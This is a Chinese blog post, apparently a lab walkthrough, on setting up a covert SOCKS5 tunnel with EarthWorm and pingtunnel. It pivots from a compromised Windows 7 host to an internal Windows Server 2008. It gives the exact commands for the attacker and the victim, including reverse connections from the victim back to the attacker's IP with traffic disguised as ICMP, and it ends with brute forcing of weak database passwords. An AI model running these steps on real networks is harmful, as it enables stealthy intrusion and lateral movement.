ew+pingtunnel组合建立socks5隧道

 
 
 
 
 
 
 

0x00 实验环境

攻击机:win(192.168.43.131)+kali(192.168.43.217)

受害机:win7(IP:192.168.43.50、192.168.59.133;双网卡,一个公网一个内网)、winserver2008(IP:192.168.59.18;仅主机:一个内网)

 

0x01 实验效果

在已经拿到公网win7服务器的前提下,通过ew与pingtunnel搭建能通往winserver2008的隧道,获取winserver2008的服务器权限

 

0x02 实验准备

工具:ew、pingtunnel、proxifer(代理工具)

https://github.com/idlefire/ew
https://github.com/esrrhs/pingtunnel

proxifer官网自行下载

工具介绍:

ew

EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。

ew+pingtunnel组合建立socks5隧道

 

pingtunnel

pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具

ew+pingtunnel组合建立socks5隧道

 0x03 打通隧道

1、kali执行:

./ew_for_linux64 -s rcsocks -l 10080 -e 8898

10080作为连接隧道的端口,8898作为隧道的通道,可以想象为,通向内网主机的路口为10080,走的这条路为8898。8898上所有的人(流量)都会通往10080这个路口。

ew+pingtunnel组合建立socks5隧道

 

2、kali执行:

./pingtunnel -type server
意思是将ew启动的sock5协议转换为icmp协议来隐藏传输

 ew+pingtunnel组合建立socks5隧道

 

3、肉鸡win7执行:

pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.43.217 -t 192.168.43.217:8898 -sock5 -1 -noprint 1 -nolog 1
意思是8898这条路上的sock5流量信息隐藏为icmp类型的数据在本肉鸡的9999端口进行转发。

 ew+pingtunnel组合建立socks5隧道

 

4、肉鸡win7执行:

ew.exe -s rssocks -d 127.0.0.1 -e 9999
在本肉鸡9999端口开启转发流量

 ew+pingtunnel组合建立socks5隧道

 

出现上述错误时,是因为你在运行pingtunnel时没有以管理员的身份运行cmd

如下就可以显示成功了:

ew+pingtunnel组合建立socks5隧道

 

5、kali上出现OK字样时表示代理搭建完成:

ew+pingtunnel组合建立socks5隧道

 

6、使用proxifer来访问内网:

ew+pingtunnel组合建立socks5隧道

 

ew+pingtunnel组合建立socks5隧道

此时再次访问win2008那台仅仅为内网的主机:

ew+pingtunnel组合建立socks5隧道

 

ew+pingtunnel组合建立socks5隧道

7、kali通过win7搭建了隧道,实现了内网横向的证明:ping winserver2008是不通的,但是挂好代理可以进行59.18的数据库弱口令爆破!

ew+pingtunnel组合建立socks5隧道

ew+pingtunnel组合建立socks5隧道

上一篇:Grammar Lessons CodeForces - 113A


下一篇:rabbitmq环境搭建